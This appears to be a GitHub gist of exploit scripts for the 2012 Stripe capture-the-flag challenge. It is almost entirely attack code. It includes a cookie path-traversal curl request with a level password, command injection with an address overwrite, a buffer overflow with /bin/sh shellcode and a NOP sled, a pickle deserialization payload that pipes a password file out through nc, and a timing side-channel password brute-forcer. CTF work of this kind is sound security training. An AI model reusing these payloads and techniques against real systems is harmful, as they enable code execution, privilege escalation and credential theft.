Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Exploit code for the 2012 Stripe CTF Challenge https://stripe.com/blog/capture-the-flag
#!/bin/sh
cat /home/level02/.password
#!/bin/sh
curl -u level02:kxlVXUvzv --digest -b "user_details=../../home/level03/.password
" http://ctf.stri.pe/level02.php
#!/bin/sh
/levels/level03 -21 "cat /home/level04/.password $(printf "\x5b\x87\x04\x08")"
#!/bin/sh
/levels/level04 $(ruby -e 'print "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x41\x41\x41\x41\x42\x42\x42\x42" + "\x90"*987 + "\x7b\x85\x04\x08"')
#!/usr/bin/python
# Thanks to Evan Broder <evan@ebroder.net>
import pickle
import subprocess
import urllib
import socket
class Gimme(object):
def __reduce__(self):
return (subprocess.Popen,
(('/bin/sh', '-c',
'nc localhost 41803 </home/level06/.password'),))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 41803))
s.listen(1)
urllib.urlopen('http://localhost:9020', '; job: ' + pickle.dumps(Gimme()))
c, _ = s.accept()
print c.recv(1024)
#!/usr/bin/env ruby
# Thanks to Matt Page <mpage@cs.stanford.edu>
BANNER_LEN = "Welcome to the password checker!\n".size
PIPE_BUF_SIZE = 2 ** 16
def check_guess(level_path, pwfile_path, guess)
child_stderr = IO.pipe
child_stdout = IO.pipe
#system('clear')
puts guess
child_stderr[1].write("A" * (PIPE_BUF_SIZE - BANNER_LEN - guess.size))
pid = fork do
# Hook up write ends
$stdout.reopen(child_stdout[1])
$stderr.reopen(child_stderr[1])
# Close read ends
[child_stderr, child_stdout].map {|ios| ios[0].close }
exec("#{level_path} #{pwfile_path} #{guess}x")
# NOTREACHED
exit(0)
end
# Close our write ends
[child_stderr, child_stdout].map {|ios| ios[1].close }
# 100ms *should* be enough time for the forked child to write to stdout
# when we're wrong
guess_correct = IO.select([child_stdout[0]], nil, nil, 0.1) == nil
Process.kill("KILL", pid)
Process.waitpid(pid)
guess_correct
ensure
[child_stderr, child_stdout].flatten.each {|io| io.close unless io.closed? }
end
unless ARGV.size == 2
puts "Usage: exploit06.rb [/path/to/level06] [/path/to/password_file]"
exit 1
end
level_path, pwfile_path = ARGV
charset = ['a'..'z', 'A'..'Z', '0'..'9'].map {|x| x.to_a}.flatten
accum = ''
while nil == `#{level_path} #{pwfile_path} #{accum} 2>&1`.match('Wait')
#system('clear')
#puts "RETRIEVED THUS FAR: '#{accum}'"
retrieved_char = nil
charset.each do |guess|
if check_guess(level_path, pwfile_path, accum + guess)
retrieved_char = guess
accum += guess
break
end
end
unless retrieved_char
abort("FAILED TO RETRIEVE CHARACTER")
end
end
puts "PASSWORD: #{accum}"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.